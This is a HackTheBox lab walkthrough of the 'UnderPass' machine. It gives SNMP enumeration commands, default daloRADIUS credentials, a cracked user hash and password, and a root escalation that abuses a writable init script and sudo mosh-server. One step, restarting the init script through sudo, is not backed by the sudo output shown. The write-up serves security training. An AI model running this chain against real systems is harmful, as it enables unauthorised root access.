Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

UnderPass (HTB – Easy)

UnderPass is a machine centered around SNMP enumeration, a misconfigured daloRADIUS installation, and a privilege escalation path through a writable /etc/init.d service. The foothold is obtained by extracting user information via SNMP and leveraging default daloRADIUS credentials. Privilege escalation is achieved by abusing the mosh-server init script and connecting with mosh-client to obtain a root shell.

Overview

Target: underpass.htb
Initial vector: SNMP enumeration → daloRADIUS default creds → user hash → SSH
Privilege escalation: writable init.d service (moshserver)

Enumeration

Nmap:

22/tcp ssh
25/tcp smtp
53/tcp dns (BIND)
80/tcp http (nginx)
161/udp snmp

The web server shows nothing useful. SNMP (UDP/161) is open — a strong indicator of misconfiguration.

SNMP Enumeration

Test community strings:

$ onesixtyone 10.10.11.48 public
-> Linux underpass ... Ubuntu 5.15 kernel

Walk the SNMP tree:

$ snmpwalk -v2c -c public 10.10.11.48
-> steve@underpass.htb

Metasploit’s SNMP enum module confirms the system is running **daloRADIUS**: 

Hostname: UnDerPass.htb is the only daloradius server in the basin!
Contact: steve@underpass.htb

Foothold – daloRADIUS Default Credentials

Documentation indicates daloRADIUS is typically installed under /daloradius. Browse: 

http://underpass.htb/daloradius/

Directory listing is forbidden, but fuzzing reveals: 

/daloradius/app/users/login.php
/daloradius/app/operators/login.php

The login panel identifies itself as **daloRADIUS 2.2 beta**. Default credentials: 

administrator : radius

Login succeeds.

Extracting User Credentials

Navigate to: 

/daloradius/app/operators/mng-list-all.php

Select user svcMosh and view details: 

Hash: 412dd4759978acfcc81deab01b382403

Crack it: 

$ hashcat or hashes.com
-> svcMosh : underwaterfriends

SSH into the machine: 

$ ssh svcMosh@10.10.11.48

User shell obtained.

Privilege Escalation – Writable moshserver Init Script

Run linpeas or manual checks: 

$ sudo -l
-> (root) NOPASSWD: /usr/bin/mosh-server

Additionally, /etc/init.d/moshserver is writable by the security group: 

$ ls -l /etc/init.d/moshserver
-rwxrwxr-- 1 root security ...

This allows modifying the service script to execute arbitrary commands as root.

Exploit Path

  1. Edit /etc/init.d/moshserver and insert a reverse shell payload.
  2. Restart the service using sudo:
$ sudo /etc/init.d/moshserver restart

Alternatively, use the intended path: Run sudo mosh-server and connect with mosh-client using the displayed key: 

$ sudo mosh-server
-> MOSH_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxx
$ mosh-client 127.0.0.1 PORT

A root shell is obtained.

Conclusion

UnderPass is a clean chain: SNMP leaks system details, daloRADIUS defaults provide admin access, user hashes lead to SSH, and a writable init script combined with mosh-server sudo privileges yields root. It’s a great example of how weak SNMP configurations can unravel an entire system.